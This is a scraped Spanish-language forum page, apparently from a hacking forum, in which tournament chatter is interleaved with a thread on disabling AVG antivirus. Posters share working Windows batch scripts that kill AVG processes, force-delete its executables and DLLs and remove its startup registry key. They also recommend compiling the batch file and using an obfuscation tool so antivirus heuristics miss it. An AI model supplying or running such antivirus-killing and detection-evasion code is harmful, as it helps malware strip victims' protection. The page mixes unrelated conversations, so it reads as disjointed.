Mensajes

Enano, eres un duro con el paint.

Tu eras enano? ya no me acuerdo...

No le vallas a decir nada a Carlos, porque ese man es muy estricto y no quiero que me regañe 

Yo tampoco le voy a decir

Por cierto, ya dije que la proxima ronda es el sabado que viene. Lo malo es que N@sh no se aparece... Después de haberse quedado dormido el sabado.

Claro claro, pero si decido algo después me andan diciendo que soy un dictador.

Entonces se quedan las eliminatorias. 2da ronda el próx. sabado, a jugar a jugar.

[NOTA:]

set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

Con eliminar el archivo no tengo problemas, con el codigo que escribi lo hace. Uso el Quick Batch file compiler y el archivo resultante no es detectado por el av, incluso ejecuto el .bat sin problemas.

Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo

Excelente, no lo había visto, lo estaré probando. Gracias

Por cierto, he descubierto que hay ciertos archivos .sys que son del propio avg y estan en el directorio de drivers, sera que estos también me causan problemas?... A este paso terminaré eliminando todo mi disco duro

Bueno el archivo estaba siendo usado por el explorer, así que se me ocurrió hacer esto:

Código [Seleccionar] Expandir

set h=explorer.exe
set i=avgse.dll
...
taskkill /f /im %h%
del /f /q /s %i%
start %h%

Y lo logra, aunque resulta algo demasiado notorio y sospechozo jaja, hay alguna otra forma de hacerlo?

Ademas aun matando ese archivo el avg sigue activo en alguna parte... ya no se donde buscar...

No hay link.

Es lo que estamos pidiendo de favorsito a Sdc

He estado investigando.

Este archivo no lo puedo eliminar ni a bala, osea ni forzandolo en el cmd ni nada:

avgse.dll

Esto es lo que encontre en internet:

Description: avgse.dll is located in a subfolder of "C:\Program Files" - normally C:\Program Files\Grisoft\AVG Free\. Known file sizes on Windows XP are 40960 bytes (47% of all occurrence), 50688 bytes, 29743 bytes, 45056 bytes, 28207 bytes.
A .dll file (Dynamic Link Library) is a special type of Windows program containing functions that other programs can call. This .dll file can be injected to all running processes and can change or manipulate their behavior. The program is not visible. The service has no detailed description. It can change the behavior of other programs or manipulate other programs. File avgse.dll is not a Windows system file. avgse.dll seems to be a compressed file. Therefore the technical security rating is 64% dangerous, however also read the users reviews.

Quiere decir que esta dll puede estar camuflada en otro proceso? como saberlo?

Ahí está mi codigo:

Código [Seleccionar] Expandir

@echo off
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
exit

Pero... pero.... debe haber una forma... Y alguien debe de saberla ¿verdad?...

No me rendiré ahora que he llegado "tan" lejos...

Carloswaldo

Mmm... bueno entonces por eliminatoria?

Algunas partidas se han postergado pero estas deben jugarse esta misma semana, el proximo sabado será la segunda ronda.

Carloswaldo

Me he tomado el trabajo de buscar todos y cada uno de los procesos que tenía activos. Unos eran del sistema, otros del vmware, etc, pero nada de nada con respecto al avg... le perdí el rastro

Si ya no hay ningún ejecutable porque se borraron todos.